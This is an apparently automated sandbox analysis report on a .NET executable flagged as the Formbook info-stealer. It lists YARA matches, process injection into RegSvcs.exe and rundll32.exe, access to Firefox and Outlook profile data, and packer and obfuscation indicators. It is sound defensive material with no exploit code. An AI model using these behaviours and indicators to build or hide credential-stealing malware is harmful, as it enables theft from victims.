Source: 00000006.00000002.72354462859.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.72354109038.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.67758522682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.72355680444.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.72355583181.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.67761207375.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Petromasila 16072024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Petromasila 16072024.exe.6b50000.5.raw.unpack, VU5FiiciHrPuThVwBQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Petromasila 16072024.exe.6b50000.5.raw.unpack, VU5FiiciHrPuThVwBQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Petromasila 16072024.exe.26d6fbc.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Petromasila 16072024.exe.26d6fbc.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, JCmbpdvjKO52nAr314.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, JCmbpdvjKO52nAr314.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, JCmbpdvjKO52nAr314.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, cipAF0JAF3euF3Mbjm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, JCmbpdvjKO52nAr314.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, JCmbpdvjKO52nAr314.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, JCmbpdvjKO52nAr314.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, cipAF0JAF3euF3Mbjm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, JCmbpdvjKO52nAr314.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, JCmbpdvjKO52nAr314.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, JCmbpdvjKO52nAr314.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, cipAF0JAF3euF3Mbjm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/2@18/12

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Petromasila 16072024.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\AppData\Local\Temp\5190-M986

Jump to behavior

Source: Petromasila 16072024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Petromasila 16072024.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"

Source: rundll32.exe, 00000006.00000002.72358552918.0000000007FE3000.00000004.00000020.00020000.00000000.sdmp, 5190-M986.6.dr

Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: Petromasila 16072024.exe	ReversingLabs: Detection: 42%
Source: Petromasila 16072024.exe	Virustotal: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\Petromasila 16072024.exe "C:\Users\user\Desktop\Petromasila 16072024.exe"
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Petromasila 16072024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Petromasila 16072024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: udkVsCOVUH.exe, 00000005.00000000.67680790960.000000000074E000.00000002.00000001.01000000.0000000A.sdmp, udkVsCOVUH.exe, 00000007.00000000.67904640161.000000000074E000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: RegSvcs.pdb, source: rundll32.exe, 00000006.00000002.72356870195.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.72354565366.00000000030BE000.00000004.00000020.00020000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000000.67905615198.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.68226266210.000000000DEFC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.67759720522.00000000012D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.67766698039.0000000004AFA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.72355857678.0000000004DCD000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.72355857678.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.67759115636.000000000494D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000004.00000002.67759720522.00000000012D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000006.00000003.67766698039.0000000004AFA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.72355857678.0000000004DCD000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.72355857678.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.67759115636.000000000494D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: RegSvcs.exe, 00000004.00000002.67759123257.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, udkVsCOVUH.exe, 00000005.00000002.72354841916.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, udkVsCOVUH.exe, 00000005.00000003.67697373118.00000000012BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000004.00000002.67759123257.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, udkVsCOVUH.exe, 00000005.00000002.72354841916.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, udkVsCOVUH.exe, 00000005.00000003.67697373118.00000000012BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: rundll32.exe, 00000006.00000002.72356870195.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.72354565366.00000000030BE000.00000004.00000020.00020000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000000.67905615198.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.68226266210.000000000DEFC000.00000004.80000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Petromasila 16072024.exe.6b50000.5.raw.unpack, VU5FiiciHrPuThVwBQ.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Petromasila 16072024.exe.26d6fbc.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, JCmbpdvjKO52nAr314.cs	.Net Code: hJxiYSXwVw System.Reflection.Assembly.Load(byte[])
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, JCmbpdvjKO52nAr314.cs	.Net Code: hJxiYSXwVw System.Reflection.Assembly.Load(byte[])
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, JCmbpdvjKO52nAr314.cs	.Net Code: hJxiYSXwVw System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024DA329 push ss; iretd	0_2_024DA32B
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024DA04B push ss; iretd	0_2_024DA04D
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024D9810 push ss; iretd	0_2_024D9812
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024D9185 push ss; iretd	0_2_024D9187
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024DAEDA push ss; iretd	0_2_024DAEE0
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024DBC01 push esp; ret	0_2_024DBC09
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024DBC3C push ss; iretd	0_2_024DBC3E
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024DAC8D push ss; iretd	0_2_024DAC8F
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A5F81 push edi; iretd	0_2_063A5F83
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A5DBA push edi; iretd	0_2_063A5DBB
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A5D89 push edi; iretd	0_2_063A5D8B
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A6DD9 push edi; iretd	0_2_063A6DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00412040 push ds; retf	4_2_00412054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00412064 push ds; retf	4_2_00412054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00414099 push E18F6D3Bh; retf	4_2_004140AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041D140 push esp; iretd	4_2_0041D141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00403190 push eax; ret	4_2_00403192
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00413C3F push esi; ret	4_2_00413CB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00413CA4 push esi; ret	4_2_00413CB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00413DAE push eax; ret	4_2_00413DC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004146AB push esi; retf	4_2_004146C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00401F9F push ds; ret	4_2_00401FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013008CD push ecx; mov dword ptr [esp], ecx	4_2_013008D6
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_0325DB00 push esp; ret	5_2_0325DB01
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_0324C3B0 push ds; retf	5_2_0324C3C4
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_0324C3D4 push ds; retf	5_2_0324C3C4
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_0324EA1B push esi; retf	5_2_0324EA34
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_0325E437 push ds; ret	5_2_0325E448
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_032574B0 push esp; iretd	5_2_032574B1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CD08CD push ecx; mov dword ptr [esp], ecx	6_2_04CD08D6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B605FD push esp; ret	6_2_02B605FE

Source: Petromasila 16072024.exe

Static PE information: section name: .text entropy: 7.94990723189694

Source: 0.2.Petromasila 16072024.exe.6b50000.5.raw.unpack, VU5FiiciHrPuThVwBQ.cs	High entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
Source: 0.2.Petromasila 16072024.exe.6b50000.5.raw.unpack, cw37txoRO4X56hm21l.cs	High entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, l3fWsdFPv5orayaK0H.cs	High entropy of concatenated method names: 'gu6RZIAuUU', 'vjNRkyPW6H', 'AKHRFbC9Mn', 'rWeRAc17D5', 'JURRUhxEte', 'HJmR00X2Im', 'a35RebJ1pm', 'yXIRtsGCGl', 'p67RWN2JcT', 'w2ER9mi8Rq'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, ij447WzfGlGXJcuefs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xQX2uEjRVW', 'ziD2RuS83J', 'qYl2ljhfZm', 'MJF2fkTQyw', 'sgO2EQlRQV', 'IF322bcqI0', 'R5A2wErTXr'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, xFoWu4bOHCTckQjhIMe.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lHgwFCjF76', 'UcpwAukdbp', 'bPVwPQwdjF', 'aq8wK4nwts', 'E1PwIang3j', 'NYnwNfqqpI', 'IHFw5S7pnj'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, cipAF0JAF3euF3Mbjm.cs	High entropy of concatenated method names: 'sIx4Fr2cvd', 'nUE4ArcH8w', 'kN84PGsdVJ', 'Wjn4KtmT55', 'BNL4IOsdmH', 'sZ24NjYEVh', 'EGO453XgqT', 'E7u4Sww1wr', 'Y1A4DOovKg', 'uYA4TFKkhn'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, JCmbpdvjKO52nAr314.cs	High entropy of concatenated method names: 'd1ROHQybPv', 'puVOMrnLdY', 'ruuO4pLP0J', 'xexO10LMoU', 'lpbOo3E4Cd', 'J8XOGCSJ3q', 'asnO33tS34', 'jgMOvPBCAb', 'V2NO7DYZPR', 'Wc4OqYdBHe'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, meaP2Zb6GteNqA0r139.cs	High entropy of concatenated method names: 'Rw92pUJrjC', 'Mgj2r48vP0', 'SWD2YSXZ19', 'Jkl2ggft0J', 'dQI2soecOo', 'dks2aRZTvZ', 'KHZ2L6j27k', 'LBH2JMhHhN', 'dpq2hxPBf3', 'Mn42QILmlb'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, BokEBx42pDUUH2u7dd.cs	High entropy of concatenated method names: 'Dispose', 'RvubDHcq6l', 'zAwmUK07OV', 'iXill9LvFI', 'aSkbTl7Fkf', 'TrfbzaMoRn', 'ProcessDialogKey', 'mOqm6t9utR', 'ciGmb8D3ch', 'ucAmm5oYpg'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, Wkl7FkSfKrfaMoRnqO.cs	High entropy of concatenated method names: 'iXNEM0AJSw', 'JILE4bGv4I', 'amuE1wronb', 'dhZEoRdqFQ', 'z5hEGo9Ch0', 'Ds5E33ufR1', 'D6JEvZ1yG5', 'DSuE7LwijK', 'J5nEqtmvDW', 'dFSEckAaG6'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, RBlQFVNqUoxbvGX7FU.cs	High entropy of concatenated method names: 'dfUfSnf1j6', 'N9kfTyV7V5', 'yrPE6o3Y5O', 'jkqEbhs0a8', 'akRfBoNM96', 'bCDfkUg2CK', 'u8ifngBPWh', 'UvcfFv4VZl', 'lN7fA47xn3', 'mBHfP8ysLB'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, bQ69K2nFYc6fNVsP33.cs	High entropy of concatenated method names: 'FkluJJoeXL', 'TuPuhKQ4QI', 'VkHuxGoPgr', 'Qt2uUlnfGN', 'kxvue6Cb4T', 'OmautFIx1V', 'UViu9YxgMH', 'J01uCoiyjq', 'X46uZKncdi', 'YkPuB64egY'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, UX2sIR97Os4ZhG6Jq2.cs	High entropy of concatenated method names: 'F8M3MJfmpa', 'nsQ31sqAHc', 'Ic33Gh9T1a', 'jprGT8LyOK', 'kdfGzbdpkn', 'wIw36JEAXo', 'IFW3bT9C7q', 'zRy3mwVmfP', 'IFE3OGg3tI', 'net3iI72Bb'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, UIChNL1LdDgWiO8vIu.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'loSmDleCf4', 'LwkmTiFMyK', 'QYZmzcoUj9', 'WUoO6xbgKE', 'avsOb8YenO', 'T99OmMJRTt', 'JUcOOLU9r0', 'Q2u3BIQ9FyJv4to2THT'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, QsRnokQ73QSgkwusTu.cs	High entropy of concatenated method names: 'd1dosJpYjM', 'rryoLo8HSW', 't0O100ydwZ', 'rkI1eg9YtD', 'Tpe1tJBSBV', 't4L1WtLWWC', 'Vnt19eYOHQ', 'veW1C0qcMJ', 'anK1yd5qjm', 'Lut1ZxmZnB'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, XbvSrjiMhS684O5sKi.cs	High entropy of concatenated method names: 'kDmb3ipAF0', 'RF3bveuF3M', 'T45bqevbM1', 'h0ibcAnsRn', 'tusbRTucOr', 'Guqblo29Jf', 'SGY8hKKZoKS1FAQQRA', 'XLGgbOY761DQfbPMmT', 'R61bbKFkrw', 'a3pbO5CWsY'
